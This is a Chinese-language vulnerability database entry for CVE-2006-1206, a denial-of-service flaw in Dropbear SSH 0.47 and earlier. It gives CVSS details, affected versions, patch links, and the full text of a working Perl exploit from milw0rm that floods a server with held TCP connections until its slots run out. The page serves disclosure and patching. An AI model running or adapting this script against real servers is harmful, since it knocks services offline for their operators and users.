CVE-2006-1206
CVSS5.0
发布时间 :2006-03-13 20:06:00
修订时间 :2008-09-05 17:01:17
NMCOE    

[原文]Matt Johnston Dropbear SSH server 0.47 and earlier, as used in embedded Linux devices and on general-purpose operating systems, allows remote attackers to cause a denial of service (connection slot exhaustion) via a large number of connection attempts that exceeds the MAX_UNAUTH_CLIENTS defined value of 30.


[CNNVD]Matt Johnston Dropbear SSH 远程拒绝服务漏洞(CNNVD-200603-228)

        Matt Johnston Dropbear SSH 服务器0.47及其早期版本,当使用在嵌入式Linux设备和一般目的操作系统上时,可以让远程攻击者通过以下途径制造一个拒绝服务(连接槽用完): 超过MAX_UNAUTH_CLIENTS中定义值30的大量连接尝试。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:matt_johnston:dropbear_ssh_server:0.36
cpe:/a:matt_johnston:dropbear_ssh_server:0.34
cpe:/a:matt_johnston:dropbear_ssh_server:0.32
cpe:/a:matt_johnston:dropbear_ssh_server:0.29
cpe:/a:matt_johnston:dropbear_ssh_server:0.39
cpe:/a:matt_johnston:dropbear_ssh_server:0.41
cpe:/a:matt_johnston:dropbear_ssh_server:0.40
cpe:/a:matt_johnston:dropbear_ssh_server:0.28
cpe:/a:matt_johnston:dropbear_ssh_server:0.31
cpe:/a:matt_johnston:dropbear_ssh_server:0.46
cpe:/a:matt_johnston:dropbear_ssh_server:0.35
cpe:/a:matt_johnston:dropbear_ssh_server:0.30
cpe:/a:matt_johnston:dropbear_ssh_server:0.33
cpe:/a:matt_johnston:dropbear_ssh_server:0.38
cpe:/a:matt_johnston:dropbear_ssh_server:0.47
cpe:/a:matt_johnston:dropbear_ssh_server:0.43
cpe:/a:matt_johnston:dropbear_ssh_server:0.45
cpe:/a:matt_johnston:dropbear_ssh_server:0.42
cpe:/a:matt_johnston:dropbear_ssh_server:0.37
cpe:/a:matt_johnston:dropbear_ssh_server:0.44

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1206
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1206
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-228
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/17024
(PATCH)  BID  17024
http://xforce.iss.net/xforce/xfdb/25075
(UNKNOWN)  XF  dropbear-connection-dos(25075)
http://www.securityfocus.com/archive/1/archive/1/426999/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060307 Dropbear SSH server Denial of Service
http://securitytracker.com/id?1015742
(UNKNOWN)  SECTRACK  1015742

- 漏洞信息

Matt Johnston Dropbear SSH 远程拒绝服务漏洞
中危 其他
2006-03-13 00:00:00 2006-03-15 00:00:00
远程  
        Matt Johnston Dropbear SSH 服务器0.47及其早期版本,当使用在嵌入式Linux设备和一般目的操作系统上时,可以让远程攻击者通过以下途径制造一个拒绝服务(连接槽用完): 超过MAX_UNAUTH_CLIENTS中定义值30的大量连接尝试。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Dropbear SSH Server 0.28
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.29
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.30
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.31
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.32
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.33
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.34
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.35
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.36
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.37
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.38
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.39
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.40
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.41
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.42
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.43
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.44
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.45
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.46
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        Dropbear SSH Server 0.47
        Dropbear dropbear-0.48.tar.gz
        http://matt.ucc.asn.au/dropbear/dropbear-0.48.tar.gz
        

- 漏洞信息 (1572)

Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service (EDBID:1572)
multiple dos
2006-03-10 Verified
0 str0ke
N/A [点击下载]
#!/usr/bin/perl
## I needed a working test script so here it is.
## just a keep alive thread, I had a few problems with Pablo's code running properly.
##
## Straight from Pablo Fernandez's advisory:
# Vulnerable code is in svr-main.c
#
# /* check for max number of connections not authorised */
# for (j = 0; j < MAX_UNAUTH_CLIENTS; j++) {
#        if (childpipes[j] < 0) {
#                break;
#        }
# }
#
# if (j == MAX_UNAUTH_CLIENTS) {
#        /* no free connections */
#        /* TODO - possibly log, though this would be an easy way
#         * to fill logs/disk */
#        close(childsock);
#        continue;
# }
## /str0ke (milw0rm.com)

use IO::Socket;
use Thread;
use strict;

# thanks to Perl Underground for my moronic coding style fixes.
my ($serv, $port, $time) = @ARGV;

sub usage
{
	print "\nDropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service Exploit\n";
	print "by /str0ke (milw0rm.com)\n";
	print "Credits to Pablo Fernandez\n";
	print "Usage: $0 [Target Domain] [Target Port] [Seconds to hold attack]\n";
	exit ();
}

sub exploit
{
	my ($serv, $port, $sleep) = @_;
	my $sock = new IO::Socket::INET ( PeerAddr => $serv,
	PeerPort => $port,
	Proto => 'tcp',
	);

	die "Could not create socket: $!\n" unless $sock;
	sleep $sleep;
	close($sock);
}

sub thread {
	print "Server: $serv\nPort: $port\nSeconds: $time\n";
	for my $i ( 1 .. 51 ) {
		print ".";
		my $thr = new Thread \&exploit, $serv, $port, $time;
	}
	sleep $time; #detach wouldn't be good
}

if (@ARGV != 3){&usage;}else{&thread;}

# milw0rm.com [2006-03-10]
		

- 漏洞信息

23960
Dropbear SSH Authorization-pending Connection Saturation DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2006-03-07 2003-01-30
2006-03-07 Unknow

- 解决方案

Upgrade to version 0.48 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站